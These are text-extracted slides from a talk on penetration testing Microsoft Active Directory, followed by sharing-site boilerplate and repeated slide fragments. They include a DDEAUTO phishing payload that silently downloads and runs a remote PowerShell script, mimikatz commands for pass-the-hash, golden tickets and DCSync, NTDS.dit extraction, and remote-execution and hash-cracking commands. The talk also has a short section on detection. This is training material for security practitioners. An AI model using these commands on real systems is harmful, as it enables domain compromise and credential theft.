Carlosgarcia Slides 180312234839

PENTESTING
ACTIVE DIRECTORY
Carlos García García
ciyinet
WHOAMI Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author book “Hacking Windows:
Ataques a sistemas y redes Microsoft”
Pentesting Active Directory ciyinet 2

- Introduction to Active Directory
WHAT ARE - Authentication Protocols
WE GOING -
-
Active Directory Penetration Testing
Reconnaissance
TO TALK - Common Attacks & Techniques
ABOUT? - Lateral and Vertical Movements
- How-to Avoid Being Caught

- AD-related techniques
BEAR IN - I learn Active Directory from the

offensive side
MIND - We lower risks and not the other
way around
- This is going to be intense

ACTIVE DIRECTORY 101

• AD is Microsoft’s answer to directory services
• Directory service is a hierarchical structure to store objects for

quick access and management of all resources

• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate
domain controllers through DNS queries
• AD supports several Naming Conventions
• User Principal Names (UPN):
• user@domain
• LDAP names (Distinguished Names):
• cn=common name
• ou=organizational unit
• dc=domain
• for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON


Just a Database: NTDS.dit

Domain Controllers and Domain Admins

CREDENTIALS FLOW IN WINDOWS

NTLM SCHEME Protocol
LM
Algorithm
DES-ECB
Secret to use
Hash LM
NTLMv1 DES-ECB Hash NT
NTLMv2 HMAC-MD5 Hash NT

KERBEROS SCHEME
Protocol Secret to use

RC4 = Hash NT
Kerberos AES128 key
AES256 key

KERBEROS SCHEME 1. Client encrypts a
timestamp with his/her
hash/key
2. Client receives a TGT

signed with the domain
krbtgt account that
proves they are who
they say they are
3. The TGT is then used

to request service
tickets (TGS) for specific
resources/services on
the domain.
Protocol Secret to use 4. DC sends a TGS

ticket encrypted using
RC4 = Hash NT the hash of the
Kerberos AES128 key account that is
associated with that
AES256 key service (SPN)

PENTESTING
ACTIVE DIRECTORY
Sure, but how about actually pentesting it?
ACTIVE DIRECTORY PENETRATION TESTING
The Goal

The Goal
• Domain admins
• Enterprise admins
• Built-in administrators
• Account Operators
• Allowed RODC Password
Replication Group
• Backup Operators
• DnsAdmins
• …

The real Goal!

The real Goal!
WMIC

ATTACK KILL CHAIN
Reference:
Microsoft Advanced Threat Analytics

ATTACK KILL CHAIN

ATTACK KILL CHAIN

PENTESTING
ACTIVE DIRECTORY
Infrastructure
PENTESTING
ACTIVE DIRECTORY
Classic Intrusion Scheme
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data
between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used as macro-less Malware
DDEAUTO
"C:\\Programs\\Microsoft\\Office365\\Outlook\\..\\..\\..\\..\\windows\\system
32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden
$e=(New-Object
System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-
test.ps1');powershell -e $e # " "Beneficios Qurtuba"

ciyinet 28
NEXT STEPS
• Persistence (userland)
• Recoinaissance
• Privilege escalation
• PowerSploit PowerUp
• Bypass UAC
•…
• Persistence (admin)
• Lateral and vertical movements
• Grab and exfiltrate trophies

PENTESTING
ACTIVE DIRECTORY
Reconnaissance
LOCAL RECONNAISSANCE
Collect information of the network, process and OS in order to
investigate what kind of machine we succeeded in infecting
Command Description
ipconfig /all Displays the IP address, subnet mask, and default gateway for all
adapters. Also info about DHCP and DNS settings
whoami /all Displays all information in the current access token, including the
current user name, security identifiers (SID), privileges, and groups that
the current user belongs to
net localgroup Displays the name of the server and the names of local groups on the
computer.
net localgroup “administrators” Displays local administrators
netstat -an Displays active TCP connections, ports on which the computer is
listening, Ethernet statistics, the IP routing table
tasklist /V Displays a list of applications and services with their Process ID (PID) for
all tasks running on either a local or a remote computer

LOCAL RECONNAISSANCE
Command Description
net start Lists started Windows services
sc qc <SERVICE> Gets the parameters for an individual service
accesschk.exe -ucqv Determine service access control rules (accesschk.exe is part of Microsoft
<SERVICE> Sysinternals suite)
systeminfo > info_output.txt Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security
information, product ID, and hardware properties, such as RAM, disk space,
and network cards
schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be
found and its parameters, as well as, crucially, what permissions they are run
with
dir, type, findstr Browse and search for information in the local file system.

NETWORK RECONNAISSANCE
Command Description
ping ☺
echo %USERDOMAIN% Domain name which the host is joined to
echo %logonserver% Obtains the name of the Domain Controller the host used to
set logonserver authenticate to
net group /domain Lists existing groups in the domain

net group <GROUP NAME>/domain Lists members of a group.
I.e: “domain computers”, “domain controllers”, “domain admins”
net localgroup administrators /domain Gets members of the built-in group “Administrators”

NETWORK RECONNAISSANCE
Command Description
net user /domain Lists all users within the domaindominio actual
net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username
net view Displays a list of domains, computers, or resources that are being
shared by the specified computer. Used without parameters, net
view displays a list of computers in your current domain
net use Access to shared resources
net accounts /domain Obtains the domain password policy
nltest /domain_trusts Maps trust relationships

ciyinet 35
PENTESTING
ACTIVE DIRECTORY
Common Attacks & Techniques
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362

COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%
• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
• SMB Shares Mining – 75%
• Credential Theft Shuffle (“Mimikatz dance”) – 60%
Reference:
https://adsecurity.org/?p=2362

KERBEROAST 1. Client encrypts a
timestamp with his/her
hash/key
2. Client receives a TGT

signed with the domain
krbtgt account that
proves they are who
they say they are
Attacker
3. The TGT is then used
to request service
tickets (TGS) for specific
resources/services on
the domain.
4. DC sends a TGS
ticket encrypted using
the hash of the
account that is
associated with that
service (SPN)

KERBEROAST
• Offline brute force of password of service account within service tickets (TGS)
• No risk of detection
• No account lockouts
• Invoke-Kerberoast from PowerView (dev) to collect hashes
• Focus on user accounts. They have shorter passwords
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper

SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerating shares in the environment and looking for data with hardcoded creds
(scripts, config files), backups, documentation…
PowerView Find-ShareDomain
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only
shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. List drives, permissions, contents,
upload/download functionality, file name auto-download pattern matching, etc.
Reference:
https://github.com/ShawnDEvans/smbmap

Titulo de la Ponencia ciyinet 42
CREDENTIAL THEFT SHUFFLE
• Escalating privileges on some machine
• Extracting creds/hashes from memory
• Derivative administrator
• User hunting: moving laterally and repeating the attack till Domain
Admin level is reached
“Mimikatz dance”
References:
https://github.com/gentilkiwi/mimikatz

DERIVATIVE ADMINISTRATOR

USER HUNTING
List local admins remotely
• Get-localadmin (Script)
• Get-NetLocalGroup (PowerView)
List active sessions remotely
• PsLoggedon (Sysinternals)
• Get-NetLoggedon (PowerView)
• Get-NetSession (PowerView)
• Tasklist
References:
https://docs.microsoft.com/en-us/sysinternals/
https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md

ciyinet 46
USER HUNTING
• Invoke-UserHunter (PowerView)
• BloodHound
1. Gets groups and group members of each group

2. Lists domain computers
3. Obtains local admins for each computer
4. Lists active sessions on each computer
References:
https://github.com/BloodHoundAD/BloodHound

ciyinet
Creds dump + Privs escalation
NTLM RELAY

PASS-THE-HASH Protocol
LM
Algorithm
DES-ECB
Secret to use
Hash LM

PASS-THE-HASH Protocol
LM
Algorithm
DES-ECB
Secret to use
Hash LM

OVERPASS-THE-HASH (PASS-THE-KEY)
Protocol Secret to use
RC4 = Hash NT
Kerberos AES128 key
AES256 key
Kerberos Kerberos
References:
http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash

(OVER)PASS-THE-HASH
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME

/ntlm:NT_HASH /run:PROGRAM"

Titulo de la Ponencia 55
PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED) -
http://tools.ietf.org/html/rfc4120#section-5.8
• Kerberos module does not require any privilege. It uses official
Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"

GOLDEN TICKET Encrypted with KRBTGT hash
Attacker
krbtgt:hash
TGT:
• Username
• Groups
membership
• …

GOLDEN TICKET
KRBTGT hash can be used to generate arbitrary TGT:
• Made by the attacker, not KDC
• Anything can be pushed inside
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH

/user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"

DCSYNC
• It “impersonates” a Domain Controller and requests account
password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory
Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit

DCSHADOW
Register new domain controllers to inject malicious AD objects
and so create backdoors or any kind of illegitimate access or
right
Hi guys! This is
DCShadow!
Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d

PENTESTING
ACTIVE DIRECTORY
dir is boring, show me how to RCE
REMOTE CODE EXECUTION
AT
at \\TARGET_HOST HH:MM EXECUTABLE
Schtasks
schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S
TARGET_HOST /RU System
schtasks /run /tn TASK_NAME /S TARGET_HOST
SC
sc \\TARGET_HOST create SERVICE_NAME binpath= “EXECUTABLE”
sc \\TARGET_HOST start SERVICE_NAME

REMOTE CODE EXECUTION
WMIC
wmic /node:TARGET_HOST process call create “EXECUTABLE”
WinRM
Invoke-Command –ComputerName TARGET_HOST –ScriptBlock { COMMAND(S) }
PsExec
PsExec.exe \\TARGET_HOST –u USER PROCESS

PENTESTING
ACTIVE DIRECTORY
Let’s grab the NTDS.dit DB
NTDS.DIT

NTDS.DIT
How-to get hashes from it:
1. Decrypt Password Encryption Key (PEK). PEK is encrypted using
bootkey
2. Hashes decryption first round with PEK using RC4
3. Hashes decryption second round with DES

GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy
vssadmin create shadow /for=C:
Ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
Invoke-NinjaCopy
Invoke-NinjaCopy –Path “C:\Windows\NTDS\ntds.dit” –LocalDestination

“C:\ntds.dit”
Invoke-NinjaCopy –Path “C:\Windows\System32\config\SYSTEM” –LocalDestination
“C:\SYSTEM”

CRACKING NT HASHES
John the Ripper
john FILE_HASHES --format=NT
Hashcat & Rockyou wordlist
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt

--potfile-path OUTPUT_NT.pot

Pentesting Active Directory 74
PENTESTING
ACTIVE DIRECTORY
But how about the blue team?
Microsoft ATA
MICROSOFT ATA

PASS-THE-HASH
• Based on local Security events
• Not capture by ATA by default
• Force NTLM to be used
• Overpass-the-hash: Encryption downgrade is detected

/ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit

PASS-THE-HASH
• Based on local Security events
• Not capture by ATA by default
• Force NTLM to be used
• Overpass-the-hash: Encryption downgrade is detected

/ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit

GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours

/aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600
/renewmax:10080 /user:USERNAME /ptt"

GOLDEN TICKET


GOLDEN TICKET


DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system
can be detected

DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system
can be detected
Microsoft ATA Attacker

PENTESTING
ACTIVE DIRECTORY
Wrapping Up
• Plaintext creds
• WDigest
• SMB Mining
• mimikittenz
• LaZagne
• WCMDump
• Hash
• Memory dump
• …

Access token
User SID
Group SIDs
Logon SID
Others …
• Run as
• NTLM Relay
• Pass-the-hash Logon session
• Pass-the-ticket
• Golden ticket

• PsExec
• WinRM
• AT
• Schtasks
• WMIC
• SC

• DCSync
• DCShadow
• Golden ticket
• SMB Mining

• DCSync
• DCShadow
• Golden ticket
• SMB Mining

• NTDS.dit
• Volume Shadow Copy
• Ntdsutil • DSInternals
• Invoke-NinjaCopy • Impacket Secretsdump • Crack hashes
• Persistence
• Golden ticket
• Skeleton key
• ACL-based backdoors
• Malicious SSP
• Password filters
• ….

• NTDS.dit
• Volume Shadow Copy
• Ntdsutil • DSInternals
• Invoke-NinjaCopy • Impacket Secretsdump • Crack hashes
• Persistence
• Golden ticket
• Skeleton key
• ACL-based backdoors
• Malicious SSP
• Password filters
• ….

BUSINESS RISK
Compromise of just one Domain Admin account in the Active Directory
exposes the entire organization to risk. The attacker would have unrestricted
access to all resources managed by the domain, all users, servers,
workstations and data.
Moreover, the attacker could instantly establish persistence in the Active

Directory environment, which is difficult to notice and cannot be efficiently
remediated with guarantees.
“Once domain admin, always domain admin”

ACKNOWLEDGMENT & REFERENCES
• Miroslav Sotak and TVM team
• FWHIBBIT
• RootedCON and any other Sec Community in Spain

PENTESTING
ACTIVE DIRECTORY

PENTESTING
ACTIVE DIRECTORY
Questions?
Answers
carlos@ciyi.es
ciyinet
ciyinet@protonmail.com

Carlosgarcia Slides 180312234839

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Carlosgarcia Slides 180312234839

Hochgeladen von

Copyright:

Verfügbare Formate

PENTESTING

Pentesting Active Directory ciyinet 2

Pentesting Active Directory ciyinet 3

BEAR IN - I learn Active Directory from the

Pentesting Active Directory ciyinet 4

Pentesting Active Directory ciyinet 5

• Directory service is a hierarchical structure to store objects for

Pentesting Active Directory ciyinet 6

Pentesting Active Directory ciyinet 7

Pentesting Active Directory ciyinet 8

Pentesting Active Directory ciyinet 9

Pentesting Active Directory ciyinet 10

Pentesting Active Directory ciyinet 11

Pentesting Active Directory ciyinet 12

Protocol Secret to use

Pentesting Active Directory ciyinet 13

2. Client receives a TGT

3. The TGT is then used

Protocol Secret to use 4. DC sends a TGS

Pentesting Active Directory ciyinet 14

Pentesting Active Directory ciyinet 16

Pentesting Active Directory ciyinet 17

Pentesting Active Directory ciyinet 18

Pentesting Active Directory ciyinet 19

Pentesting Active Directory ciyinet 20

Pentesting Active Directory ciyinet 21

Pentesting Active Directory ciyinet 22

Pentesting Active Directory ciyinet 27

Pentesting Active Directory ciyinet 29

Pentesting Active Directory ciyinet 31

Pentesting Active Directory ciyinet 32

net group /domain Lists existing groups in the domain

Pentesting Active Directory ciyinet 33

Pentesting Active Directory ciyinet 34

• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%

• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%

• SMB Shares Mining – 75%

• Credential Theft Shuffle (“Mimikatz dance”) – 60%

Pentesting Active Directory ciyinet 37

• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%

• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%

• SMB Shares Mining – 75%

• Credential Theft Shuffle (“Mimikatz dance”) – 60%

Pentesting Active Directory ciyinet 38

2. Client receives a TGT

Pentesting Active Directory ciyinet 39

• Invoke-Kerberoast from PowerView (dev) to collect hashes

• Focus on user accounts. They have shorter passwords

• JohnTheRipper (magnumripper) to crack them

Pentesting Active Directory ciyinet 40

Pentesting Active Directory ciyinet 41

Pentesting Active Directory ciyinet 43

Pentesting Active Directory ciyinet 44

Pentesting Active Directory ciyinet 45

1. Gets groups and group members of each group

Pentesting Active Directory ciyinet 47

Pentesting Active Directory ciyinet 50

Pentesting Active Directory ciyinet 51

Pentesting Active Directory ciyinet 52

Pentesting Active Directory ciyinet 53

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME

Pentesting Active Directory ciyinet 54

mimikatz.exe "kerberos::ptt FILENAME"

Pentesting Active Directory ciyinet 56